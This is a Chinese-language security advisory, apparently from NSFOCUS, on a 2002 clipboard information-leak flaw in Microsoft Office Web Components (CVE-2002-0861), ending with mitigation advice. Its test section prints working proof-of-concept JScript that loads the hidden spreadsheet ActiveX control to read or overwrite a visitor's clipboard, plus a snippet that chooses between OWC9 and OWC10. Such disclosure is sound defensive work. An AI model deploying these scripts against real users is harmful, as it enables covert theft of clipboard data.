首页 -> 安全研究
安全研究
安全漏洞
Microsoft OWC剪贴板信息泄露漏洞
发布日期:2002-04-08
更新日期:2002-04-12
受影响系统:
Microsoft Office Web Components 9描述:
Microsoft Office Web Components 10
BUGTRAQ ID: 4457
CVE(CAN) ID: CVE-2002-0861
Microsoft Office Web Components (OWC)是一套ActiveX对象,使用Spreadsheets、Charts、Pivot tables等提供WEB页面更丰富的HTML文档形式。OWC在OFFCIE2000和OFFICE XP下都默认安装,也可以独立的下载使用。
Microsoft Office Web Components (OWC9和OWC10)中在处理Range对象和Cell对象中存在漏洞,导致远程攻击者可能完全控制剪贴板操作。
通过WOC9和OWC10中的Spreadsheet组件可以使攻击者即使用户把浏览器设置在安全区域(intranet)中,也可以完全控制剪贴板操作。通过设置相关Range对象的"Paste"模式和Cell对象中的"Copy"模式,就可以控制剪贴板,攻击者可以监视剪贴板信息并记录到自己控制的服务器,导致敏感信息泄露;攻击者也可以把数据插入到剪贴板。
<*来源:GreyMagic Software (security@greymagic.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0093.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的方法可以读取剪贴板内容:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
// Paste to spreadsheet
oSP.ActiveSheet.UsedRange.Paste();
// Read the spreadsheet
var oRng=oSP.ActiveSheet.UsedRange,
iRows=oRng.Rows.Count,
iCols=oRng.Columns.Count,
sRes="";
for (var iCRow=1;iCRow<=iRows;iCRow++) {
for (var iCCol=1;iCCol<=iCols;iCCol++) {
sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
}
sRes+="\n";
}
// Display result
alert(sRes);
}
</script>
下面的代码可以指定剪贴板内容:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
oSP.Cells(1,1).Value="Trustworthy computing";
oSP.Cells(1,1).Copy();
}
</script>
其中上面<object>元素的控件ID是OWC9的spreadsheet组件,OWC10的控件ID是"0002E551-0000-0000-C000-000000000046"。
攻击者可以使用下面的代码来选择OWC9或者OWC10:
<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
<!-- Failed, try to include OWC9 -->
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
<!-- None found -->
Failed to load any of the spreadsheet components.
</object>
</object>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 通过设置浏览器的安全配置来关闭执行Active X控件。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/Default.asp
浏览次数:3201
严重程度:0(网友投票)
绿盟科技给您安全的保障